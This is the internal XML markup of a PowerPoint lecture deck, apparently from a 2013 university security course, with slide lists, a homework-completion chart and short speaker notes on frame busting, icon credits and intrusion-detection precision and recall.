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3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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId82"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId83"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="836" r:id="rId3"/>
    <p:sldId id="839" r:id="rId4"/>
    <p:sldId id="841" r:id="rId5"/>
    <p:sldId id="842" r:id="rId6"/>
    <p:sldId id="843" r:id="rId7"/>
    <p:sldId id="844" r:id="rId8"/>
    <p:sldId id="845" r:id="rId9"/>
    <p:sldId id="846" r:id="rId10"/>
    <p:sldId id="847" r:id="rId11"/>
    <p:sldId id="849" r:id="rId12"/>
    <p:sldId id="848" r:id="rId13"/>
    <p:sldId id="850" r:id="rId14"/>
    <p:sldId id="852" r:id="rId15"/>
    <p:sldId id="853" r:id="rId16"/>
    <p:sldId id="921" r:id="rId17"/>
    <p:sldId id="922" r:id="rId18"/>
    <p:sldId id="923" r:id="rId19"/>
    <p:sldId id="854" r:id="rId20"/>
    <p:sldId id="855" r:id="rId21"/>
    <p:sldId id="856" r:id="rId22"/>
    <p:sldId id="884" r:id="rId23"/>
    <p:sldId id="885" r:id="rId24"/>
    <p:sldId id="886" r:id="rId25"/>
    <p:sldId id="887" r:id="rId26"/>
    <p:sldId id="888" r:id="rId27"/>
    <p:sldId id="889" r:id="rId28"/>
    <p:sldId id="890" r:id="rId29"/>
    <p:sldId id="891" r:id="rId30"/>
    <p:sldId id="892" r:id="rId31"/>
    <p:sldId id="893" r:id="rId32"/>
    <p:sldId id="894" r:id="rId33"/>
    <p:sldId id="895" r:id="rId34"/>
    <p:sldId id="896" r:id="rId35"/>
    <p:sldId id="897" r:id="rId36"/>
    <p:sldId id="898" r:id="rId37"/>
    <p:sldId id="899" r:id="rId38"/>
    <p:sldId id="900" r:id="rId39"/>
    <p:sldId id="901" r:id="rId40"/>
    <p:sldId id="902" r:id="rId41"/>
    <p:sldId id="903" r:id="rId42"/>
    <p:sldId id="904" r:id="rId43"/>
    <p:sldId id="905" r:id="rId44"/>
    <p:sldId id="906" r:id="rId45"/>
    <p:sldId id="907" r:id="rId46"/>
    <p:sldId id="908" r:id="rId47"/>
    <p:sldId id="909" r:id="rId48"/>
    <p:sldId id="910" r:id="rId49"/>
    <p:sldId id="911" r:id="rId50"/>
    <p:sldId id="912" r:id="rId51"/>
    <p:sldId id="913" r:id="rId52"/>
    <p:sldId id="914" r:id="rId53"/>
    <p:sldId id="915" r:id="rId54"/>
    <p:sldId id="916" r:id="rId55"/>
    <p:sldId id="918" r:id="rId56"/>
    <p:sldId id="917" r:id="rId57"/>
    <p:sldId id="919" r:id="rId58"/>
    <p:sldId id="920" r:id="rId59"/>
    <p:sldId id="857" r:id="rId60"/>
    <p:sldId id="858" r:id="rId61"/>
    <p:sldId id="859" r:id="rId62"/>
    <p:sldId id="860" r:id="rId63"/>
    <p:sldId id="861" r:id="rId64"/>
    <p:sldId id="862" r:id="rId65"/>
    <p:sldId id="863" r:id="rId66"/>
    <p:sldId id="866" r:id="rId67"/>
    <p:sldId id="868" r:id="rId68"/>
    <p:sldId id="870" r:id="rId69"/>
    <p:sldId id="871" r:id="rId70"/>
    <p:sldId id="873" r:id="rId71"/>
    <p:sldId id="878" r:id="rId72"/>
    <p:sldId id="882" r:id="rId73"/>
    <p:sldId id="883" r:id="rId74"/>
    <p:sldId id="931" r:id="rId75"/>
    <p:sldId id="924" r:id="rId76"/>
    <p:sldId id="925" r:id="rId77"/>
    <p:sldId id="926" r:id="rId78"/>
    <p:sldId id="927" r:id="rId79"/>
    <p:sldId id="268" r:id="rId80"/>
    <p:sldId id="38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AEE1610-0505-CA4A-BCC7-AA58FD6B1707}">
          <p14:sldIdLst>
            <p14:sldId id="836"/>
            <p14:sldId id="839"/>
            <p14:sldId id="841"/>
            <p14:sldId id="842"/>
            <p14:sldId id="843"/>
            <p14:sldId id="844"/>
            <p14:sldId id="845"/>
            <p14:sldId id="846"/>
            <p14:sldId id="847"/>
            <p14:sldId id="849"/>
            <p14:sldId id="848"/>
            <p14:sldId id="850"/>
            <p14:sldId id="852"/>
            <p14:sldId id="853"/>
            <p14:sldId id="921"/>
            <p14:sldId id="922"/>
            <p14:sldId id="923"/>
            <p14:sldId id="854"/>
            <p14:sldId id="855"/>
            <p14:sldId id="856"/>
            <p14:sldId id="884"/>
            <p14:sldId id="885"/>
            <p14:sldId id="886"/>
            <p14:sldId id="887"/>
            <p14:sldId id="888"/>
            <p14:sldId id="889"/>
            <p14:sldId id="890"/>
            <p14:sldId id="891"/>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18"/>
            <p14:sldId id="917"/>
            <p14:sldId id="919"/>
            <p14:sldId id="920"/>
            <p14:sldId id="857"/>
            <p14:sldId id="858"/>
            <p14:sldId id="859"/>
            <p14:sldId id="860"/>
            <p14:sldId id="861"/>
            <p14:sldId id="862"/>
            <p14:sldId id="863"/>
            <p14:sldId id="866"/>
            <p14:sldId id="868"/>
            <p14:sldId id="870"/>
            <p14:sldId id="871"/>
            <p14:sldId id="873"/>
            <p14:sldId id="878"/>
            <p14:sldId id="882"/>
            <p14:sldId id="883"/>
            <p14:sldId id="931"/>
            <p14:sldId id="924"/>
            <p14:sldId id="925"/>
            <p14:sldId id="926"/>
            <p14:sldId id="927"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{FAD998B4-7667-8F40-A1A8-42BF6A185D67}">
          <p14:sldIdLst>
            <p14:sldId id="268"/>
            <p14:sldId id="387"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="1392">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="19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verick Woo" initials="ma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chemeClr va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C5C8B"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="0080FF"/>
    <a:srgbClr val="3F5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D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8" autoAdjust="0"/>
    <p:restoredTop sz="81791" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="2718" y="714"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1392"/>
        <p:guide pos="3840"/>
        <p:guide pos="19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0" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="-347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burket\Dropbox\18487-f13\assignments\f13-hw\hw3\grading\HW3Grad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Early Finishes</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Sheet3!$A$34:$H$34</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="8"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet3!$A$35:$H$35</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="8"/>
                <c:pt idx="0">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="422181936"/>
        <c:axId val="422180368"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="42218193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Days Early</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180368"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="422180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 of Students</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:layout>
            <c:manualLayout>
              <c:xMode val="edge"/>
              <c:yMode val="edge"/>
              <c:x val="1.311374595617408E-2"/>
              <c:y val="0.2744488470795123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181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281C90-955A-E944-AB32-466E55900D6A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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F8D97-067E-974E-BD5D-FA8C0988A610}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2595091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EA11A-7C1A-F544-A99B-661F38A45889}" type="datetime1">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5A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32917664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beerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warning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eerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warning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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544013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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228906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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10798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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267196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taken from Web Application Hacker’s Handbook</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217852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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/shock/#icon-No6840" target="_blank"&gt;Shock&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jimlears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Jim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64980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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2652536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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/cursor/#icon-No3065" target="_blank"&gt;Cursor&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fernando.yellow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;Fernando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vasconcelos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386283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http://beerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21344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http://beerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1849923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appears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to be the same thing as Recall. Recall = \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>frac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>{True positives}{True Positives + False Negatives}</a:t>
            </a:r>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204940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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun Project</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129695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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120533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what this equation is saying. What’s the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> probability, given an alert, that an intrusion has occurred.  This will be the crux of whether an IDS is useful or not.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appears</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to be the same thing as Precision. Precision = \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>frac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>{True positives}{True Positives + False Positives}</a:t>
            </a:r>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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3539781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5A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254873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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt; designed by &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242414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from Web Application Hacker’s Handbook</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233298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from Web Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>Hacker’s Handbook</a:t>
            </a:r>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18039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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135599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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1286186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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286062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5A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100333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Master" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag75.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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Master" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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Master" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag90.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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slideMaster" Target="../slideMasters/slideMaster2.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2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag130.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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A99170D3-89C4-BB42-836D-D925400CC7A3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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4657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3C1F5B7F-F702-E24B-B97E-863D4E495E13}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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21823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CA9756D6-8139-C44F-931B-372F152FA7C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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5371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2DE4327B-086F-C14D-B06F-CE57E273F375}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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25644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fld id="{E2D3BD3B-C321-3747-A281-298A36F52409}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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AD5B71E-FB01-F541-8DE0-7E75CAB5AD6F}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17273560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0" i="0">
                <a:solidFill>
